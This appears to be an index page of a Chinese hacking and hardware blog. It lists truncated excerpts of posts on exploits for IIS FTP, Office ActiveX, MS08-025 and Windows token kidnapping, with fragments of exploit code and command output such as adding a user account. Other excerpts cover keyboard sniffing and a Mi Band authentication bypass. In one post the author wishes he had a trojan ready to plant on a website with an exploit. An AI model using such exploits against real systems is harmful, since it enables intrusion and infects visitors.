小米手環分析
摘要:
認證很簡單,只需要在FF04的UUID中寫入20字節的值并校驗通過,就可以對手環進行讀寫指令控制。
其實有個更簡單的,只要給Immediate Alert這個屬性發送0x01或者0x02即可啟動“女性娛樂模式”,不需要任何認證:
(這個屬性本來是用來可穿戴設備的找回功能的)
...
閱讀全文
Sniffing Proprietary 2.4GHz Signals
摘要:
(U) Sniffing Proprietary 2.4GHz Signals
使用HackRF或者RTL-SDR加變頻器,那是極好的,但是我最終需要把所有東西都打包到一個小空間里面。
。。。。。。
閱讀全文
打算做個HackRF
摘要:
國外官方是300美元左右,目前買不到,國內有做的,賣2800人民幣,買不起。只能自己做了,好幾個芯片好貴啊,都上百了。
閱讀全文
使用xgoldmon項目調試監控本機通信
摘要:
支持手機(感覺可以把手機設置成MODEM模式支持AT命令的應該都可以)
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。。
閱讀全文
OsmocomBB項目
摘要:
之前看過好多大牛玩osmocomBB項目,改個手機,連電腦,然后編譯一堆東西,到最后都是開個console,滿屏紅紅綠綠的文字滾動,看著很吊。
但都不說最終能干啥,滾屏完了就沒了,大牛都太低調了,最近有朋友也在搞這個,了解了一下,以下描述都是我最近查閱的大量鳥文資料及少量中文資料之后的理解,如有誤望指出。
OsmocomBB是國外一個開源項目,是GSM協議棧(Protocols stack)的開源實現,全稱是Open source mobile communication Baseband.目的是要實現手機端從物理層(layer1)到layer3的三層實現。
這里記錄一下過程,以便備忘和其它有需要的童鞋少走彎路。
........
閱讀全文
Raspberry Pi 增加TFT顯示
摘要:
Raspberry Pi是一款基于Linux系統的個人電腦,配備一枚700MHz的處理器,256內存,支持SD卡和Ethernet,擁有兩個USB接口,以及 HDMI和RCA輸出支持。
有消息稱,雖然Raspberry Pi看起來非常的迷你——只有一張信用卡大小,但是它能夠運行像《雷神之錘三:競技場》這樣的游戲和進行1080p視頻的播放。但是以這次接TFT屏試用結果看,我覺得至少SPI是純屬扯J8蛋,可能HDMI速度快點,但是就以那編譯內核的速度來看,并不樂觀。
... ...
閱讀全文
TVB-Gone 紅外編碼方法(每次都重新推算一遍,年紀大了還是記錄一下吧)
摘要:
每次都重新推算一遍,年紀大了還是記錄一下吧(
硬件版的TV-B-Gone的壓縮編碼跳過此段往下看)
N900上有個TVB-Gone的程序,但是程序的紅外編碼往往都是對應的國外的電視,好多國產電視都不支持,
有時候需要遙控空調或者投影之類的,只能自己錄入了,大概看了一下,編碼比較簡單(比硬件那個簡單多了,畢竟不需要考慮程序空間的問題)
(上次錄過一次,這次又重搞一遍,還是記錄一下,以備后用。)
。。。
閱讀全文
Raspberry Pi 入手安裝配置 (有圖有真相)
摘要:
托rock的福,跟風敗了個Raspberry Pi,(破手機照的,還可以吧 ^_^),安裝配置如下:
閱讀全文
無線鍵盤監聽(更新 LCD 1602)
摘要:
一個國外的開源項目,通過截獲無線鍵盤發出的信號,來監聽鍵盤按鍵操作,第一個版本支持監聽27MHz的無線鍵盤,第二個版本支持2.4G的無線鍵盤監聽及注入功能,爽。
以前玩過C51單片機,加上本身自學能力和手工焊接功底不錯,磕磕絆絆幾個月下來,終于初步完成了這個小玩意。
這次的芯片是ATMEL的MEGA64A,比之前C51系列的又強大、復雜了不少,制作過程中遇到非常多的問題,在這里鄙視一下(強烈地)國內的知識共享精神
…………
閱讀全文
Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版
摘要:
綁定4444端口,Windows 2000 CN + SP4 測試通過,需要能建目錄的用戶,偏移地址若不通用,請自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................
閱讀全文
TRS (文本檢索系統)注入
摘要:
TRS 是英文Text Retrieval System(文本檢索系統)的縮寫,據說是全文檢索、搜索引擎、內容管理及知識管理核心技術和產品的統一,入選2008年度國家規劃布局內重點軟件企業,做某些滲透經常會碰到。
......
閱讀全文
Overwrite $_FILE array in rfc1867 - Mime multipart/form-data File Upload
摘要:
鳥文沒太看明白,摸索了一下,$_FILE數組元素解析的問題。
搭個php的環境,目錄在C:\www下,根目錄下有個upload.php代碼如下
......
閱讀全文
黑客控制整棟大廈電力系統,改編成游戲!
摘要:
這才是牛逼黑客,控制整棟大廈電力系統,大廈燈光來做背景,改編成游戲!坦克大戰~~
.............
閱讀全文
以色列人發現的IE 0day (ZT)
摘要:
測試成功,點打印后,會彈出計算器
.........
閱讀全文
Token Kidnapping Windows 2003 PoC exploit (Win2K3測試成功)
摘要:
我的有啥補丁打啥補丁的Win2k3 CN SP1測試成功
d:\Churrasco.exe "net user 009 /add"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......
閱讀全文
WordPress暴絕對路徑
摘要:
(之前發的"關于Fs2You怎么才能不被和諧"的文章被和諧掉了)
裝WordPress順便看到的
默認plugins目錄有hello.php文件,不過好像很多插........
閱讀全文
Microsoft Office Snapshot Viewer ActiveX Exploit (可執行版)
摘要:
lcx給的,網上的都是放啟動項,這個可以自動執行
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
.........
閱讀全文
MS08-025 for win2k & win2k3
摘要: Win2k CN SP2 ,Win2k3 CN SP1下測試通過,其它未測試(不裝XP那種垃圾)
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo
閱讀全文
Firefox自定義referer插件(Firefox突破防盜鏈)
摘要:
RefControl 0.8.10
要是上次找到這個插件就好了,省得我一遍一遍地用nc修改referer提交
很多防盜鏈和防本地提交是依靠用戶瀏覽器自動提交.......
閱讀全文
Firefox突破圖片防盜鏈
摘要: 以下方法修改完后,再刷新本頁就能看到上面圖片
Firefox:輸入about:config進入配置頁面,修改network.http.sendRefererHeader的值為1即可(默認是2),
.....
閱讀全文
Real Player rmoc3260.dll Exp (老C給的,據說好用)
摘要:
milw0rm上的,生成器
lcx給的,稍微改了改代碼,據說好用
未測試,最近忙到自殺的時間都沒有
唉,可惜有馬時候沒洞,有洞時候沒馬,要不就找個站掛上了。
http://www.aygfsteel.com/Files/baicker/Real........
閱讀全文
簡單認識Anti-RootKit(ZT)
摘要: 現在RK(rootkit)和ARK(anti- rootkit)的斗爭已經進行了很久,在印象中最早出來的ARK工具是冰刃(IceSword),從冰刃開始出來到現在RK和ARK的斗爭一直在繼續,目前冰刃還是在流行當中,自己感覺也正是冰刃的出來才帶動了當前流行的RK和ARK的斗爭呵呵,現在很多病毒木馬已經廣泛的帶有驅動,使用一些RK的技術和方法使自己更底層些更強大些,當前流行的ARK工具主要包括:隱藏進程檢測,內核驅動檢測,SSDT檢測,代碼HOOK檢測,注冊表隱藏的檢測,隱藏文件的檢測等一些功能的,下面談談自己對一些功能的簡單愚見 嘻嘻。
..........
閱讀全文